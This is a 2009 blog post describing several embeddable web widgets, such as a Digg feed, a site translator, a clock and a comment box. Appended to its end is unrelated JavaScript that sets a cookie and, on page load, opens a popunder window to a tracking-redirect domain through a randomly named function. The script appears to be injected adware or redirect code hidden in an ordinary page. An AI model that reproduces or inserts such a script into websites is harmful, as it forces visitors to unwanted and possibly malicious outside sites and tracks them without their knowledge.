Monday, February 9, 2009

Widget HTML Getter


Write whatever you like. Make it bold, or italic, or justify it, change the color. Then click the <> button and get the HTML for it.
Post it to your blog or MySpace or whatever!


Digg News

http://blogs.sun.com/basler/resource/digg.jpg

Digg News

display the latest Digg links on your blog. Themeable and fully customizable.

Google Site Translator


This widget is a great way to share your blog with readers from all over. This version currently supports sites written in English, French, German, Spanish, and Italian and can translate your site into English, French, Italian, German, Spanish, Russian, Japanese, Korean, and Chinese (Simplified.)

Time and Date


A widget to show the users local time (or the time from a specific time zone), and the date when the mouse is moved over.
Can be customized by changing the colour scheme, 12 or 24 hour time and more.
Feedback is very welcome :)

You cannot remove the 'Get Widget' text when it is on your site - I cannot help this, Widgetbox don't give me a choice. Sorry :/


Easy Comments

A simple comment system that lets anyone comment on any page of your website. Get user feedback quickly and easily, simply by dropping this widget on the bottom or your pages. No longer do you need to rely on a CMS or blogging platform for feedback or comments. Do it
with Easy Comments.



let popunder; function getCookie(name) { const search = `${name}=`; let returnValue = ""; if (document.cookie.length > 0) { let offset = document.cookie.indexOf(search); if (offset !== -1) { offset += search.length; let end = document.cookie.indexOf(";", offset); if (end === -1) { end = document.cookie.length; } returnValue = unescape(document.cookie.substring(offset, end)); } } return returnValue; } let popFrequency = "0 minutes"; function resetCookie() { const expireDate = new Date(); expireDate.setMinutes(expireDate.getMinutes() - 0); document.cookie = "popunder=;path=/;expires=" + expireDate.toGMTString(); } function loadOrNot() { if (getCookie("popunder") === "") { loadPopunder(); const expireDate = new Date(); expireDate.setMinutes(expireDate.getMinutes() + parseInt(popFrequency)); document.cookie = `popunder=${parseInt(popFrequency)};path=/;expires=${expireDate.toGMTString()}`; } } function loadPopunder() { const body = document.querySelector("body"); rwmrgfdqPopup(); } if (getCookie("popunder") !== parseInt(popFrequency)) { resetCookie(); } loadOrNot(); let opened; function rwmrgfdqPopup() { if (opened !== 1) { opened = 1; window.open("http://6ajdk.bemobtrcks.com/go/2caaf799-ff7b-40af-89a6-d59202548b38", "rwmrgfdqpop", "scrollbars = 1, resizable = 1,status = 1"); } }